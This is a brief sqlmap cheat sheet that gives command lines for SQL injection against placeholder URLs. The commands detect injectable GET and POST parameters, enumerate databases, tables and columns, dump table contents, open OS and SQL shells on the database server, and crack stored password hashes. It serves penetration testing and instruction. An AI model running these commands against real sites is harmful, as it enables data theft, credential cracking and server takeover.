sqlmap website

Running sqlmap against GET parameters

Finding injection points and the database type

sqlmap -u "target_url" -b

e.g.

sqlmap -u "http://test.com/index.php?user=abcd" -b

-b = Retrieve DBMS banner: tries to get infomation about the underlying database. Returns a list of injection points and the database type.

Finding the current database user

sqlmap -u "target_url" --current-user

To get an active shell on the database

sqlmap -u "target_url" --os-shell

Forcing the database type

sqlmap -u "target_url" --dbms=[database type]

To have SQLMAP guide you through the process:

sqlmap --wizard

Running sqlmap against POST parameters

sqlmap -u "target_url" --data="author=admin" -b

e.g.

sqlmap -u "http://test.com/index.php" --data="author=admin" -b

Getting a list of the databases present on the remote system

sqlmap -u "target_url" --dbs

Finding the tables that exist in a database

sqlmap -u "target_url" --tables -D database_name

Getting the columns from a table

sqlmap -u "target_url" --columns -D database_name -T table_name

Dumping data from a table

sqlmap -u "target_url" --dump -D database_name -T table_name

To start an interactive shell

sqlmap -u "target_url" --sql-shell -D database_name -T table_name

To break password hashes

sqlmap -u "target_url" --passwords -D database_name -T table_name

To search for common table names

sqlmap -u "target_url" --common-tables -D database_name